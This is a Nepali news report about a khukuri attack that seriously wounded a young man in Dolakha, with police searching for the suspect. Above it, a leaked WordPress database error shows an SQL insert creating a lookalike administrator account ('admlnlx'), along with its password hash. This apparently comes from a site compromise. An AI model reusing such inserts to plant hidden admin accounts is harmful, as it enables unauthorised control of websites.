WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BrQHdjTNK5sR5g12rsb60DXxo0Ynwy0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 16:17:43', '', 'admlnlx', 'admlnlx')
चरिकोट, पुस २६ –
दोलखाको नाम्दु गाविस–२ मा एक युवक खुकुरी प्रहारबाट गम्भीर घाइते भएका छन् ।
सोही गाविस–२ कै वर्ष २३ का सुरेश तामाङले २१ वर्षीय सुन्दर अधिकारीलाई खुकुरी प्रहार गरी गम्भीर घाइते बनाएको जिल्ला प्रहरी कार्यालय दोलखाले बताएको छ ।
प्रहरीका अनुसार अधिकारीको स्वास्थ्य अवस्था गम्भीर छ । उनको घाँटी नजिकै पछाडिपट्टिको भागमा खुकुरीको ठूलै चोट रहेको छ । सोमबार राति सामान्य उपचार पनि उनलाई काठमाडौँ ग्राण्डी अस्पतालमा लगिएको बताइएको छ । घटना के कति कारण भएको हो भन्नेबारेमा अनुसन्धान भइरहेको छ । प्रहरी नायब उपरीक्षक रबिन कार्कीले फरार आक्रमणकारी तामाङको खोजी भइरहेको जानकारी दिनुभएको छ । – रासस